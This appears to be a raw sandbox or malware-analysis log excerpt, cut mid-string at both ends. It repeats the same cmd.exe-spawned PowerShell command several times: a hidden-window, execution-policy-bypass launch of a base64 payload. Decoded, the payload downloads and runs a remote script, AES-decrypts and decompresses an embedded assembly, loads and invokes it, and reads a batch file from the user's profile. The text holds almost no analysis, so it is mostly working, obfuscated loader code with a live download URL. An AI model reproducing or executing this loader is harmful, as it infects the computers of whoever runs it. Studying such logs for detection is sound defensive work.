ERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOw